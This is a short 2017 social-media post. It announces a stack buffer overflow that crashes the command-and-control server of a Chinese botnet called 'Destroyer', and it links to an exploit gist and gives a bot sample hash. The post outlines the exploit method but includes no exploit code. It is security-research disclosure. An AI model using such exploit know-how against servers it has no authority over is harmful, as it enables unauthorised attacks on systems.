slipstream/RoL‮⚡‭Dec 4, 2017

So, there's a Chinese botnet package known as "Destroyer" (破坏者).

It, ironically, can itself be destroyed, thanks to a stack buffer overflow.

I wasn't able to get full RCE, but a jump to "call ExitProcess" should be enough, no? It can be triggered directly after "start DDoS", for even more lulz.

Here's the exploit: https://gist.github.com/Wack0/d0aa7f56d5d044fb918056207d2149b1

And here's a bot sample hash: b17535de8061dce3d6630e92d601ebe1ebac44ed52b3a04a8bb72f6661f23d44

Let's #destroythedestroyer :)

#infosec #botnet #exploit

Kill a "破坏者Lv5.0" / "Destroyer Lv5.0" C2 server

Kill a "破坏者Lv5.0" / "Destroyer Lv5.0" C2 server